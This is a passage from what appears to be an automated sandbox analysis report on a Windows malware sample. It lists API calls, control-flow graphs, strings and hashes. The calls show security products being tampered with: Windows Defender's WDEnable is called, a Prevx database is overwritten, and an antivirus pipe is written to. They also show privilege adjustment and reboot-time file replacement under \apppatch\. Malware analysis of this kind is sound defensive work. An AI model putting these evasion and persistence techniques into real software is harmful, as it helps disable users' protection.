                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.Z8EHWAVQAH(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 193611197-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 284 4020e0-40213c memset SHGetFolderPathA 285 4021a7-4021a9 284->285 286 40213e-40215f PathAppendA SetCurrentDirectoryA 284->286 287 4021b2-4021c2 285->287 288 4021ab-4021ac FreeLibrary 285->288 286->285 289 402161-402173 LoadLibraryA 286->289 288->287 289->285 290 402175-402183 GetProcAddress 289->290 290->285 291 402185-402192 290->291 291->285
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 293 402680-4026ac CoInitializeEx 294 4026ae-4026b1 293->294 295 4026bf-4026e7 GetModuleFileNameW SysAllocString 293->295 294->295 296 4026b3-4026b9 294->296 297 402869-40286f 295->297 298 4026ed-4026f8 SysAllocString 295->298 296->295 299 4028c4-4028c9 296->299 300 402871-402876 297->300 301 402879-40287e 297->301 302 402853-402861 SysFreeString 298->302 303 4026fe-40271f CoCreateInstance 298->303 300->301 306 402880-402885 301->306 307 402888-40288d 301->307 304 402863-402864 SysFreeString 302->304 305 402866 302->305 308 402725-40272a 303->308 309 402827-40282a 303->309 304->305 305->297 306->307 311 402897-40289c 307->311 312 40288f-402894 307->312 308->309 310 402730-402741 308->310 309->302 310->302 318 402747-402758 310->318 313 4028a6-4028ab 311->313 314 40289e-4028a3 311->314 312->311 316 4028b5-4028b7 313->316 317 4028ad-4028b2 313->317 314->313 319 4028b9-4028bc 316->319 320 4028be CoUninitialize 316->320 317->316 318->302 322 40275e-402768 318->322 319->299 319->320 320->299 323 40276d-40276f 322->323 323->302 324 402775-40277c 323->324 325 402851 324->325 326 402782-402793 324->326 325->302 326->325 328 402799-4027b1 326->328 330 4027b3-4027d3 CoCreateInstance 328->330 331 40282c-40283d 328->331 332 4027d5-4027da 330->332 333 4027dc 330->333 331->325 337 40283f-402843 331->337 332->333 334 4027de-4027e3 332->334 333->334 334->325 336 4027e5-4027f0 334->336 336->325 340 4027f2-402803 336->340 337->325 338 402845-40284e 337->338 338->325 340->325 342 402805-402814 340->342 342->325 344 402816-402825 342->344 344->325
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              Function 00402A70 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,75C8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNELBASE(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.Z8EHWAVQAH(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 450058505-3112416296
                                                                                                                                                                                                              • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              Function 004001CA Relevance: 25.0, APIs: 12, Strings: 1, Instructions: 2235fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 171 4001ca-4001e3 173 4001e5-400258 171->173 174 400259 171->174 175 40025a-401011 173->175 174->175 180 401017-40101a 175->180 181 40113c-401141 175->181 180->181 182 401020-401022 180->182 182->181 183 401028-401044 CreateFileA 182->183 184 401139 183->184 185 40104a-401051 call 401e00 183->185 184->181 188 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 185->188 189 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 185->189 188->189 192 40106a-401089 GetSecurityDescriptorSacl 188->192 190 401105 189->190 191 4010f5-401103 SetEndOfFile 189->191 193 401108-401111 190->193 191->190 191->193 194 4010a0-4010a4 LocalFree 192->194 195 40108b-40109a SetNamedSecurityInfoA 192->195 196 401113-401120 GetHandleInformation 193->196 197 40112f-401136 193->197 194->189 195->194 196->197 198 401122-401126 196->198 198->197 199 401128-401129 CloseHandle 198->199 199->197
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769
                                                                                                                                                                                                              Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              Function 004000F1 Relevance: 24.0, APIs: 12, Strings: 1, Instructions: 1300fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
